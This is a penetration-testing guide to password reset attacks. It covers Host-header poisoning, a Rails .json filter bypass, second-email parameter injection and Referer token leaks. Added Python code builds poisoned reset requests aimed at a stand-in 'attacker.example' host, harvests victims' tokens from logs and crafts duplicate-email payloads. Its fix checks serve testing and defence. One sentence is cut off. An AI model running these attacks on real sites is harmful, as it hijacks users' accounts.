- Header Poisoning
- Password Reset Token Filter Bypass
- Email Parameter Manipulation
- Password Token Referral Header Leak
- Check List
The following document outlines key techniques used when assessing password reset functions on modern web applications and APIs; a useful resource for bug bounty hunters and penetration testers performing password reset security testing.
Header Poisoning
Host: Header Injection Password Reset URL
The following headers can be modified in an attempt to change the host in the password reset URL to an attacker controlled domain, potentially allowing an attacker to obtain the reset token when the user clicks the link in the email to perform a password reset. The application is vulnerable when it builds the absolute reset link from request headers instead of from a configured canonical hostname.
Potentially Vulnerable Headers
Host Header Password Reset
Replace the Host: header with a server you control. Many front ends route on the Host header, so a changed value may never reach the application; if you get an error page or a default virtual host back, try the variants below.
Double Host Header
Often when the Host header is modified the application or WAF fails to process the request. A technique which can potentially bypass this filter is to simply add a second Host header to the request: keep the legitimate value in the first and put the attacker controlled domain in the second. Components that disagree about which duplicate header to honour may route on one value and build the reset link from the other.
X-Forwarded-Host Header
Keep the legitimate Host header and add an attacker controlled domain in an X-Forwarded-Host header. Applications deployed behind reverse proxies often trust this header as the original host when generating absolute URLs.
Confirm Vulnerable
- Request a password reset as normal, but modify the Host header (or one of the variants above) to a domain you control
- Check that the reset link in the email sent by the application points at the test domain, not the application's domain
PoC
- Replace the vulnerable header with the attacker controlled domain
- Send the request
- Wait for the victim to click the reset link (or demonstrate the PoC with a second test account you control)
- Extract the token from the logs of the webserver you control
- Use the extracted token to take over the user account; do this before the victim completes their own reset, as reset tokens are typically single use and time limited
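The steps above, as an added example that is not code from the original page. It shows the server-side bug (reset link built from request headers) next to the hardened form, builds the three raw request variants from the section above, and implements the checks from the Confirm Vulnerable and PoC steps. APP_HOST, ATTACKER_HOST, RESET_PATH and the `token` parameter name are assumptions about a hypothetical target; the email body and access-log lines in the usage are constructed.

```python
"""Host-header poisoning of password-reset links (added example).

Assumptions: APP_HOST / ATTACKER_HOST / RESET_PATH and the 'token' query
parameter describe a hypothetical target, not any real application.
"""
import re
from urllib.parse import parse_qs, urlparse

APP_HOST = "app.example"             # assumption: the legitimate application host
ATTACKER_HOST = "attacker.example"   # assumption: a host whose web logs you control
RESET_PATH = "/api/password/forgot"  # assumption: the reset endpoint


def vulnerable_reset_link(headers, token):
    """The bug: the link host is taken from the request, so X-Forwarded-Host
    or Host is trusted. Header names are matched case-insensitively and a
    later duplicate overwrites an earlier one, which is the behaviour the
    'double Host' variant relies on in some stacks."""
    lower = {}
    for name, value in headers:
        lower[name.lower()] = value
    host = lower.get("x-forwarded-host") or lower.get("host")
    return f"https://{host}/reset?token={token}"


def safe_reset_link(token):
    """Hardened form: the link host comes from server configuration only."""
    return f"https://{APP_HOST}/reset?token={token}"


def reset_request_variants(victim_email):
    """Raw HTTP/1.1 requests for the three header variants. They are built
    by hand because most HTTP client libraries refuse to send two Host
    headers, which the 'double Host' variant needs; send them over a TLS socket."""
    body = f"email={victim_email}"
    tail = ["Content-Type: application/x-www-form-urlencoded",
            f"Content-Length: {len(body)}", "Connection: close"]
    variants = {
        "host_replaced": [f"Host: {ATTACKER_HOST}"],
        "double_host": [f"Host: {APP_HOST}", f"Host: {ATTACKER_HOST}"],
        "x_forwarded_host": [f"Host: {APP_HOST}",
                             f"X-Forwarded-Host: {ATTACKER_HOST}"],
    }
    return {name: ("\r\n".join([f"POST {RESET_PATH} HTTP/1.1"] + hdrs + tail)
                   + "\r\n\r\n" + body).encode()
            for name, hdrs in variants.items()}


LINK_RE = re.compile(r"https?://[^\s\"'<>]+")


def is_poisoned(email_body):
    """Confirm Vulnerable step 2: does any link in the email the application
    sent point somewhere other than the application host?"""
    hosts = [urlparse(u).hostname for u in LINK_RE.findall(email_body)]
    return any(h is not None and h.lower() != APP_HOST for h in hosts)


def tokens_from_access_log(log_text):
    """PoC step 4: pull reset tokens out of the attacker webserver's access
    log (combined-format lines; the sample used below is constructed)."""
    tokens = []
    for line in log_text.splitlines():
        m = re.search(r'"GET (\S+) HTTP/1\.[01]"', line)
        if m:
            tokens.extend(parse_qs(urlparse(m.group(1)).query).get("token", []))
    return tokens


if __name__ == "__main__":
    # constructed sample data, not captured from any real target
    poisoned_mail = "Reset your password: https://attacker.example/reset?token=abc123"
    log = ('203.0.113.5 - - [10/Oct/2024:13:55:36 +0000] '
           '"GET /reset?token=abc123 HTTP/1.1" 404 0 "-" "Mozilla/5.0"')
    print("poisoned:", is_poisoned(poisoned_mail))
    print("harvested tokens:", tokens_from_access_log(log))
    print(reset_request_variants("victim@example.org")["double_host"].decode())
```

The raw requests are the part worth keeping: confirming the double Host variant usually means stepping outside `requests` and writing the bytes to a socket yourself, since well-behaved clients collapse or reject duplicate Host headers.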
Password Reset Token Filter Bypass
If the app is built on Ruby on Rails, try adding a .json extension to the end of the password reset URL. Rails treats the suffix as a response format and routes the request to the same controller action, so in certain circumstances ACL bugs exist where a filter or authorisation rule keyed on the exact path does not cover the .json variant; adding the extension could potentially bypass any additional layers of protection the application has in place.
- Add .json to the end of the reset token URL
- Observe the application's response to see if the
Email Parameter Manipulation
Password Change Functions
Intercept & Change the Email
- Intercept the password change request and replace the email address parameter with one that you control; check whether the confirmation or reset link is sent to the supplied address instead of the one on file for the account
Password Reset Functions
Add Second Email
Vulnerable applications can be manipulated to send password reset codes to multiple email addresses.
- Intercept the request and add a second, attacker controlled email address to it
Modify the parameter to match the application's format.
Match the API Request Schema
Match the application's or API's request formatting when adding the additional email address: a repeated form field, a comma separated value, or a JSON array or duplicate key, depending on what the endpoint already consumes. The bug being hunted is a backend that validates one copy of the parameter but mails another.
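The second-email variants described above, as an added example that is not code from the original page. It builds the payloads a tester would try against a form-encoded and a JSON reset endpoint, and shows why duplicate keys matter: two common server-side parsers disagree about which copy wins. The parameter name `email` and the extra `cc` field are assumptions about a hypothetical target.

```python
"""Second-email payload variants for password-reset requests (added example).

Assumptions: the endpoint reads an 'email' parameter; 'cc' is a guessed
extra recipient field and exists on no real target in particular.
"""
import json
from urllib.parse import parse_qs, urlencode


def form_payloads(victim, attacker):
    """application/x-www-form-urlencoded bodies, ready to send as-is."""
    return {
        "duplicate_param": urlencode([("email", victim), ("email", attacker)]),
        "comma_separated": urlencode({"email": f"{victim},{attacker}"}),
        "array_param": urlencode([("email[]", victim), ("email[]", attacker)]),
    }


def json_payloads(victim, attacker):
    """application/json bodies. The duplicate-key case is assembled by hand
    because json.dumps cannot emit two identical keys from a dict."""
    return {
        "array_value": json.dumps({"email": [victim, attacker]}),
        "duplicate_key": '{"email": %s, "email": %s}'
                         % (json.dumps(victim), json.dumps(attacker)),
        # 'cc' is an assumed extra recipient field, not from the page
        "extra_recipient": json.dumps({"email": victim, "cc": attacker}),
    }


def recipients_seen_by_python_backends(form_body, json_body):
    """What two common server-side parsers would actually read.
    parse_qs keeps every copy of a repeated field; json.loads keeps the LAST
    duplicate key. A backend that validates the first value (the victim)
    but mails the last one (the attacker) is the bug this technique hunts."""
    form_emails = parse_qs(form_body).get("email", [])
    json_email = json.loads(json_body).get("email")
    return form_emails, json_email


if __name__ == "__main__":
    victim, attacker = "victim@example.org", "attacker@example.net"  # constructed
    for name, body in {**form_payloads(victim, attacker),
                       **json_payloads(victim, attacker)}.items():
        print(f"{name:16} {body}")
    print(recipients_seen_by_python_backends(
        form_payloads(victim, attacker)["duplicate_param"],
        json_payloads(victim, attacker)["duplicate_key"]))
```

Send each variant with the content type the endpoint already uses and watch which mailbox receives the code; a variant that produces a validation error on the attacker address is as informative as one that silently succeeds.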
Password Token Referral Header Leak
Vulnerable applications leak the password reset URL, and with it the token, via the Referer header when the reset page loads resources from, or links out to, third-party domains.
Assess the target using an intercepting proxy: open a valid reset link, then check whether any outbound request to another domain carries the reset URL in its Referer header. A Referrer-Policy of no-referrer (or same-origin) on the reset page prevents the leak.
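The proxy check described above, as an added example that is not code from the original page. It scans exported proxy traffic (a constructed list of request records stands in for a Burp or HAR export) for third-party requests whose Referer carries a reset token, and includes the response-header check for the fix. The application host, the token parameter names and the `/reset/<token>` path style are assumptions about a hypothetical target.

```python
"""Finding password-reset tokens leaked through the Referer header (added example).

Assumptions: APP_HOST, TOKEN_PARAMS and RESET_PATH_PREFIX describe a
hypothetical target; the request records used below are constructed.
"""
from urllib.parse import parse_qs, urlparse

APP_HOST = "app.example"                          # assumption: application under test
TOKEN_PARAMS = ("token", "reset_token", "code")   # assumption: query names a token travels under
RESET_PATH_PREFIX = "/reset/"                     # assumption: path-style links look like /reset/<token>

# Policies that strip at least the path and query from cross-origin requests.
SAFE_POLICIES = {"no-referrer", "same-origin", "origin", "strict-origin",
                 "origin-when-cross-origin", "strict-origin-when-cross-origin"}


def referer_token_leaks(records):
    """records: iterable of dicts with 'url' and 'headers' (name -> value),
    one per request seen in the proxy. Returns (third_party_host, token) for
    every request that left the app with a reset token in its Referer."""
    leaks = []
    for rec in records:
        dest = urlparse(rec["url"]).hostname
        headers = {k.lower(): v for k, v in rec.get("headers", {}).items()}
        ref = headers.get("referer")
        if not ref or dest is None or dest.lower() == APP_HOST:
            continue                      # same-origin traffic is not a leak
        ref_url = urlparse(ref)
        if (ref_url.hostname or "").lower() != APP_HOST:
            continue                      # Referer is not one of our pages
        params = parse_qs(ref_url.query)
        for name in TOKEN_PARAMS:
            for value in params.get(name, []):
                leaks.append((dest, value))
        if ref_url.path.startswith(RESET_PATH_PREFIX):
            leaks.append((dest, ref_url.path[len(RESET_PATH_PREFIX):].split("/")[0]))
    return leaks


def reset_page_policy_ok(response_headers):
    """The fix check: the reset page must send a Referrer-Policy that keeps
    the path and query out of cross-origin requests. When several values are
    listed, the last recognised one is the one browsers apply."""
    policy = {k.lower(): v for k, v in response_headers.items()}.get("referrer-policy", "")
    values = [p.strip().lower() for p in policy.split(",") if p.strip()]
    return bool(values) and values[-1] in SAFE_POLICIES


if __name__ == "__main__":
    # constructed proxy records, not captured from any real target
    sample = [
        {"url": "https://cdn.analytics.example/pixel.gif",
         "headers": {"Referer": "https://app.example/reset?token=abc123"}},
        {"url": "https://app.example/static/app.js",
         "headers": {"Referer": "https://app.example/reset?token=abc123"}},
        {"url": "https://fonts.example/f.woff2",
         "headers": {"Referer": "https://app.example/reset/xyz789"}},
    ]
    print(referer_token_leaks(sample))
    print(reset_page_policy_ok({"Referrer-Policy": "no-referrer"}))
```

Run it over the full proxy history for the reset flow rather than the reset page alone: the leak often happens on the page the user lands on after the token is consumed, when the token is still in the URL.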
Check List
- Host Header Injection Password Reset Function
- Double Host Header Injection Password Reset Function
- X-Forwarded-Host Header Injection Password Reset Function
- .json Extension Password Reset Token Filter Bypass (Ruby on Rails)
- Email Parameter Manipulation on Password Change Functions (replace email with attacker controlled address)
- Email Parameter Manipulation on Password Reset Functions (add attacker controlled second email address)
- Password Reset Token Leak via Referer Header
Enjoy.